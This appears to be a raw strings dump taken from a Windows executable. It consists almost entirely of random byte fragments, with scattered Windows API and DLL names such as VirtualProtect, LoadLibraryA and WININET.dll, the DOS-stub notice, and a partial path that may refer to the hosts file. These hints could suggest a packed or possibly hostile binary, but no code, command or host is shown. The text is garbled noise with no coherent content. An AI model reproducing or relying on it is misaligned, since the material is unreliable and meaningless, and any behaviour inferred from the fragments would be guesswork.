l9nFpRr^t
la/4.0 (
LaH),'SL
lB127.0
LBnew_n
ld?<`1
ld,&tf
+LGeH*
(`;l&I
{)lkIM
.lnkwu@S8L
LoadLibraryA
\.LPTX.
,<LP{Wp{
L ,Q\*/
lqR(~Y
l^RF8<
Lsoftw
LUk<A	
,<L<X<x<
l.yi85
lZm@v:
M0s041<1
M4s+*W^
M6icFM&
mb1	'C$
M<dSM*>
MEPr\P
.miji`iCr
MiscSt
MjC=Ia
>mN+E`;
=MODULE_
Mp6ER)i!
mP#GE`
MP~'p'S
@@> _MQ`
&m|rl_DZgL
msBgAg
Mtnt\ &Box
&%MU\U
$!M;y%
M-Yu2!
N',]:,
N43V4Tn|@
n4d"ou
nC/sE0
NDh&%X
:nE"yP
NH-6>Ym.
n`hfRg4@
 n!lwu
`.NNnk
No such.
NotSupp
nPv`~p
n!Qc^C[
#nrO-uID
 n'R.p
nt>j,5
n;@X/'b
NYgh8m0
}/o,*4
~O4n4v4
|O4Zq=4,
o!9, %8
o)APPA
o[.bpke
od$~53Z
_of_rf@j
OGt*j=
O'H|pD4Y9
o{KIY:HTTP+
ole32.dll
OLEAUT32.dll
oledlg.dll
OleRun
ol^Z|[
O.mpGp
omPoizo'F
oOl?Dt-c
opyright 19
OSK:-E
oT9dB:)
^]o"$t*j
O#tv{ 
).oub472
o"u>Vj
oVERRORB
]p-0$v)
/p3_kM
p3:$W<E
P6 wG8
?PAK_<
pA:QFj
PathMatchSpecA
p C0z%d
}pD9~,
pe4rr0}
_pg8l7hl-sm
ph0 p[
|pH3r!
)'PHea
ph*x.+
Pibly.
$PiSs{
#PL-(;=
PLH?zZ
+PnK~N
[/posi
ppsGiQIYI\Qiyi4
P%)/Q!
PRiIj#
@p.Rs{
ptfV?X
pT__LB`+
\ptx|\.
[`@PUY^
Pvi8x"C
pVN:]V	
#"pw_C
Q4\/-6
[qfI@EH
Qhhf[#
qK C*h
Q$K( L
\@QlR 
}}QQPC1
QQV|o~
qri1Free3pv5
q.(tlK
*QtRtNJ
  qui*
QV.D2q
Q --wj-
q=::Z/v
r54*YZ
r6-	J[
r8<@DHr
r&9S,PI
r,9YvQ
	r>B)Ab,f&
rdi2b."
rdR<O{
RegFlushKey
r	F=QO
rfZP:i>
Ribb\#
RichEdit Tex
R.J#;^
r: m.v1"h4
>"-Ro%	
RpnDc?THREA
rs\etc\ho
 RWH'7O
rwiqa^U
RyGtkV
RykP#q
'<\;"s
s3Kjw%
S3Y3d3p3
Saf1Dhk
SCh*OV
sctorgBn
s^%d. 
S"#E"tse
S_g	SPP
shadu007qsXK
SHELL32.dll
Sh@*h<)
shHN#x
SHLWAPI.dll
sHs @ Dc
_SIMULATE Zs
SjC+s-
sjxun9
~skQ_7
SLDX~r
s;%Mak-
SP+LYIQ
<[SQF9
s.s>@9I
sug@wu
#s|VPuT
.,$s/z 0
-t,0tRC
t1030O
T2X2hp
T*4b}B.S_*
T5`5l~@6
t 6zVhDJ8
t8lBar%'MDIFrS
"t^9(uZ
`tap	5
tC5Zrft^ 
t@c@g!
t!c/n"
tCQC}7ku.
.te_oB
!This program cannot be run in DOS mode.
Th spa
Th$s'Wed
t,ikwv
#Tj _f
_TLS: 
(tmc'>VPW
>$T@p<
TPLD0(
tplhd`y
TRD&>,
~&t#\rlP
t*SWp7=
ttp://A,
TV`\W8
^tXuX:
t[YZAv
#TZ 2m
tZH7$<
t=ZVP?P
&{ -_u
u0E0xC
U&0J(W
+u1s,J
>u8SSW(
u{/b/k@(
uc`iHQq
U.hU5R
u[Js"N-U
=u/l*97
U)l p6
um;219.23
ungpl|n
-=Upde%
*u#&PV
$	 UPVQ
UQPXY]G
UQr(pIpVPn
uR{0X@2
uRFGHt
urityP
?Us6Ex
uSdT,[	8|
USER32
USER32.dll
uvwxyz#
VC20XC00
vc521s`'
&=,VgD
([V||h
vhZF84
vI(4o 
V^iabS
v,i&h'TP
VirtualAlloc
VirtualFree
VirtualProtect
 VisUC++ RA
V[K9?	
V;<?;`l&
@|.VMD
Vndv%|
VNZ$|`
,&[vrH
v$/s:;
v[Sh$`
VSPLAY`
v\<UNI
>VUSWY
VV&K 99i
V{$ vt
VWQPW9
>:-|vy
w2@3L3X:x3
W2]WpXk/'X
`W(4fRB
w50o0y0
w]&5:S8
was about o
	+w=B+
w'Bhrb
wbPben
$Wd$^3
WFVvHe
w"F$WRk`
w_" hbe*
<WHg+$$
WININET.dll
WINSPOOL.DRV
wLVSPh
?	Wm%/
WmM4<%
#WNexE.
W|NVW8
wsgwdnI13
WTK0s(VS
}wVtGV
WwktZ%L
X`?{|}~
X2Wt/@
x( ~.}4
.x9ika
X$hO;Ib
xhSG8j
xijklm&pq
x JyO$
xlg-i"
xmlns="
xN._. 
xpdXP^Dy
XPTPSW
+Xpu1*\
'X)!RF\
XtR99fy
xVRHERV
XV)Z8JSw
@,Y=	#
~ (/Y<2
y*,51u
y@<840
ydXL@4
?*@Yf+
Yh%muR
yI}cig
_yn1Zfrtg
YP)tyYY
<:y&q?	
yR]>"*.
ythVF6{
y,t_[yx
.y-upp;
yvdN@2
y\XTPL
.< }z"
zBjP AR
_ZDWQ}
zl\N64
,ZN0Mtm<Q
Zp~d2t
<Zpe+l
 ZUrufa%\;
zuThXHN
zW'xlg
zx1*O_
;@#[ZxJu
Zz /,T